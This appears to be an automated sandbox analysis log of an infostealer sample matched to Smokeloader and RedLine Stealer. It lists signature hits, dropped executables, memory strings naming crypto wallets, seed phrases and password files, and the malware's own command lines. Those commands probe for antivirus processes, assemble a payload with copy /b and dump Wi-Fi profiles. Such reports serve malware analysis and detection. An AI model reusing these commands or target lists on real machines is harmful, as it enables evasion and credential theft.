                      Source: 00000000.00000002.1708988921.0000000000751000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 0000001F.00000002.2469988089.0000000002C00000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000003.00000002.1984144647.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000023.00000002.2438465954.00000000004D0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000023.00000002.2438711950.000000000063D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000000.00000002.1708692549.0000000000720000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000003.00000002.1987664254.00000000006EC000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 0000002A.00000002.2865725310.00000000033A1000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: 00000023.00000002.2438798088.0000000001FC1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000000.00000002.1709555486.000000000080D000.00000040.00000020.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_RedLineStealer_ed346e4c reference_sample = a91c1d3965f11509d1c1125210166b824a79650f29ea203983fffb5f8900858c, os = windows, severity = x86, creation_date = 2022-02-17, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.RedLineStealer, fingerprint = 834c13b2e0497787e552bb1318664496d286e7cf57b4661e5e07bf1cffe61b82, id = ed346e4c-7890-41ee-8648-f512682fe20e, last_modified = 2022-04-12
                      Source: 00000003.00000002.1984120576.00000000004C0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: 00000003.00000002.1988409529.00000000020D1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_4e31426e reference_sample = 1ce643981821b185b8ad73b798ab5c71c6c40e1f547b8e5b19afdaa4ca2a5174, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = cf6d8615643198bc53527cb9581e217f8a39760c2e695980f808269ebe791277, id = 4e31426e-d62e-4b6d-911b-4223e1f6adef, last_modified = 2021-08-23
                      Source: 00000022.00000002.2578412540.00000000005E0000.00000040.00001000.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Smokeloader_3687686f reference_sample = 8b3014ecd962a335b246f6c70fc820247e8bdaef98136e464b1fdb824031eef7, os = windows, severity = x86, creation_date = 2021-07-21, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Smokeloader, fingerprint = 0f483f9f79ae29b944825c1987366d7b450312f475845e2242a07674580918bc, id = 3687686f-8fbf-4f09-9afa-612ee65dc86c, last_modified = 2021-08-23
                      Source: Process Memory Space: InstallUtil.exe PID: 5544, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_EXE_Discord_Regex author = ditekSHen, description = Detects executables referencing Discord tokens regular expressions
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exe, type: DROPPEDMatched rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID author = ditekSHen, description = Detects executables referencing Windows vault credential objects. Observed in infostealers
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exe, type: DROPPEDMatched rule: INDICATOR_EXE_Packed_DotNetReactor author = ditekSHen, description = Detects executables packed with unregistered version of .NET Reactor
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exe, type: DROPPEDMatched rule: MALWARE_Win_DLInjector04 author = ditekSHen, description = Detects downloader / injector
                      Source: 987123.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 4577.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 5390.exe.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: wehjbuw.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: ufhjbuw.1.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: csrss.exe.24.drStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: 35E5.dll.1.drStatic PE information: Section: .CRT ZLIB complexity 0.9986780201027055
                      Source: 2DF.exe.1.drStatic PE information: Section: fkgjuy7 ZLIB complexity 0.99775390625
                      Source: E35F.exe.1.dr, --.csCryptographic APIs: 'CreateDecryptor'
                      Source: E35F.exe.1.dr, --.csCryptographic APIs: 'CreateDecryptor'
                      Source: E35F.exe.1.dr, --.csCryptographic APIs: 'CreateDecryptor'
                      Source: E35F.exe.1.dr, --.csCryptographic APIs: 'CreateDecryptor'
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000035BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .txt .doc .docx .kdbx .rdp .pdf .loli .lolix .anom .cs .cpp .csproj
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000035BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: scan electrum metamask wallet phrase recover secret security code seed nft backup coin key pass password exodus trust binance huobi card cash money btc usdt eth bitcoin crypto mail gmail log kyc blochchain ledger.txt .doc .docx .kdbx .rdp .pdf .loli .lolix .anom .cs .cpp .csproj`,^q
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000035BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: ix .anom .cs .cpp .csproj
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000035BB000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: scan electrum metamask wallet phrase recover secret security code seed nft backup coin key pass password exodus trust binance huobi card cash money btc usdt eth bitcoin crypto mail gmail log kyc blochchain ledger.txt .doc .docx .kdbx .rdp .pdf .loli .lolix .anom .cs .cpp .csproj
                      Source: InstallUtil.exe, 0000002A.00000002.2865725310.00000000035BB000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 0000002A.00000002.2865725310.00000000033F7000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: .csprojt-^q
                      Source: classification engineClassification label: mal100.troj.spyw.evad.winEXE@85/54@13/20
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00409BE6 wvsprintfW,GetLastError,FormatMessageW,FormatMessageW,FormatMessageW,lstrlenW,lstrlenW,lstrlenW,lstrcpyW,lstrcpyW,lstrcpyW,LocalFree,8_2_00409BE6
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0AD940 AdjustTokenPrivileges,CloseHandle,21_2_00007FF73D0AD940
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifCode function: 21_2_00007FF73D0AE22C LookupPrivilegeValueW,AdjustTokenPrivileges,GetLastError,21_2_00007FF73D0AE22C
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004032B5 GetDiskFreeSpaceExW,SendMessageW,8_2_004032B5
                      Source: C:\Users\user\Desktop\987123.exeCode function: 0_2_0081019D CreateToolhelp32Snapshot,Module32First,0_2_0081019D
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_004038DD SHGetSpecialFolderPathW,CoCreateInstance,8_2_004038DD
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeCode function: 8_2_00404C1A GetModuleHandleW,FindResourceExA,FindResourceExA,FindResourceExA,SizeofResource,LoadResource,LockResource,GetProcAddress,GetProcAddress,wsprintfW,GetProcAddress,8_2_00404C1A
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Roaming\ufhjbuwJump to behavior
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6340:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \BaseNamedObjects\Local\SM0:5324:64:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess5968
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMutant created: \Sessions\1\BaseNamedObjects\ejmrudbxvv
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3496:120:WilError_03
                      Source: C:\Windows\SysWOW64\WerFault.exeMutant created: \Sessions\1\BaseNamedObjects\Local\WERReportingForProcess2736
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeMutant created: \Sessions\1\BaseNamedObjects\Global\Protect544cd51a.dll
                      Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:1440:120:WilError_03
                      Source: C:\Windows\explorer.exeFile created: C:\Users\user\AppData\Local\Temp\35E5.tmpJump to behavior
                      Source: 987123.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeSection loaded: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorlib.tlb
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\WerFault.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_64\mscorlib\b8493bec853ac702d2188091d76ccffa\mscorlib.ni.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeSection loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a403a0b75e95c07da2caa7f780446a62\mscorlib.ni.dll
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\SysWOW64\tasklist.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT __PATH, ProcessId, CSName, Caption, SessionId, ThreadCount, WorkingSetSize, KernelModeTime, UserModeTime FROM Win32_Process
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWMI Queries: IWbemServices::ExecQuery - root\CIMV2 : SELECT Name FROM Win32_Processor
                      Source: C:\Windows\explorer.exeFile read: C:\Users\user\Searches\desktop.iniJump to behavior
                      Source: C:\Users\user\Desktop\987123.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                      Source: 987123.exeReversingLabs: Detection: 45%
                      Source: 987123.exeVirustotal: Detection: 47%
                      Source: unknownProcess created: C:\Users\user\Desktop\987123.exe C:\Users\user\Desktop\987123.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ufhjbuw C:\Users\user\AppData\Roaming\ufhjbuw
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\35E5.dll
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\35E5.dll
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3BD2.exe C:\Users\user\AppData\Local\Temp\3BD2.exe
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k cmd < Advancement & exit
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4577.exe C:\Users\user\AppData\Local\Temp\4577.exe
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe"
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir 15372
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Zoo + Viewers + Bow + Contractors + Protection + Desk + Kinds 15372\Far.pif
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Payday + Corporate + Spain 15372\i
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif 15372\Far.pif 15372\i
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhost
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeProcess created: C:\Users\user\AppData\Local\Temp\4577.exe C:\Users\user\AppData\Local\Temp\4577.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9D1E.exe C:\Users\user\AppData\Local\Temp\9D1E.exe
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k WerSvcGroup
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2736 -ip 2736
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1160
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E35F.exe C:\Users\user\AppData\Local\Temp\E35F.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2DF.exe C:\Users\user\AppData\Local\Temp\2DF.exe
                      Source: unknownProcess created: C:\Users\user\AppData\Roaming\ufhjbuw C:\Users\user\AppData\Roaming\ufhjbuw
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5390.exe C:\Users\user\AppData\Local\Temp\5390.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5968 -ip 5968
                      Source: C:\Users\user\AppData\Local\Temp\2DF.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 500
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1600.exe C:\Users\user\AppData\Local\Temp\1600.exe
                      Source: C:\Users\user\AppData\Local\Temp\1600.exeProcess created: C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmp "C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmp" /SL5="$D029C,4455529,54272,C:\Users\user\AppData\Local\Temp\1600.exe"
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe XXX
                      Source: C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmpProcess created: C:\Users\user\AppData\Local\Temp\1600.exe "C:\Users\user\AppData\Local\Temp\1600.exe" /SPAWNWND=$B02AC /NOTIFYWND=$D029C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FD8E.exe C:\Users\user\AppData\Local\Temp\FD8E.exe
                      Source: C:\Windows\explorer.exeProcess created: C:\Windows\System32\regsvr32.exe regsvr32 /s C:\Users\user\AppData\Local\Temp\35E5.dllJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\3BD2.exe C:\Users\user\AppData\Local\Temp\3BD2.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\4577.exe C:\Users\user\AppData\Local\Temp\4577.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\9D1E.exe C:\Users\user\AppData\Local\Temp\9D1E.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\E35F.exe C:\Users\user\AppData\Local\Temp\E35F.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe" Jump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\2DF.exe C:\Users\user\AppData\Local\Temp\2DF.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\5390.exe C:\Users\user\AppData\Local\Temp\5390.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\1600.exe C:\Users\user\AppData\Local\Temp\1600.exeJump to behavior
                      Source: C:\Windows\explorer.exeProcess created: C:\Users\user\AppData\Local\Temp\FD8E.exe C:\Users\user\AppData\Local\Temp\FD8E.exeJump to behavior
                      Source: C:\Windows\System32\regsvr32.exeProcess created: C:\Windows\SysWOW64\regsvr32.exe /s C:\Users\user\AppData\Local\Temp\35E5.dllJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\3BD2.exeProcess created: C:\Windows\SysWOW64\cmd.exe "C:\Windows\System32\cmd.exe" /k cmd < Advancement & exitJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "avastui.exe avgui.exe nswscsvc.exe sophoshealth.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\findstr.exe findstr /I "wrsa.exe"Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c mkdir 15372Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Zoo + Viewers + Bow + Contractors + Protection + Desk + Kinds 15372\Far.pifJump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\cmd.exe cmd /c copy /b Payday + Corporate + Spain 15372\i Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif 15372\Far.pif 15372\i Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\PING.EXE ping -n 5 localhostJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\4577.exeProcess created: C:\Users\user\AppData\Local\Temp\4577.exe C:\Users\user\AppData\Local\Temp\4577.exeJump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pifProcess created: C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif C:\Users\user\AppData\Local\Temp\7ZipSfx.000\15372\Far.pif Jump to behavior
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 432 -p 2736 -ip 2736
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 2736 -s 1160
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -pss -s 488 -p 5968 -ip 5968
                      Source: C:\Windows\System32\svchost.exeProcess created: C:\Windows\SysWOW64\WerFault.exe C:\Windows\SysWOW64\WerFault.exe -u -p 5968 -s 500
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\E35F.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe XXX
                      Source: C:\ProgramData\Drivers\csrss.exeProcess created: C:\ProgramData\Drivers\csrss.exe "C:\ProgramData\Drivers\csrss.exe"
                      Source: C:\Windows\SysWOW64\WerFault.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1600.exeProcess created: C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmp "C:\Users\user\AppData\Local\Temp\is-K8FH3.tmp\1600.tmp" /SL5="$D029C,4455529,54272,C:\Users\user\AppData\Local\Temp\1600.exe"
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: C:\Windows\SysWOW64\cmd.exe "cmd.exe" /C chcp 65001 && netsh wlan show profile | findstr All
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\1600.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\chcp.com chcp 65001
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess created: unknown unknown
                      Source: C:\Users\user\AppData\Local\Temp\FD8E.exeProcess created: unknown unknown
                      Source: C:\Windows\explorer.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{603D3801-BD81-11d0-A3A5-00C04FD706EC}\InProcServer32Jump to behavior
                      Source: C:\Windows\SysWOW64\cmd.exeProcess created: C:\Windows\SysWOW64\tasklist.exe tasklist
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\AppData\Local\Temp\9D1E.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
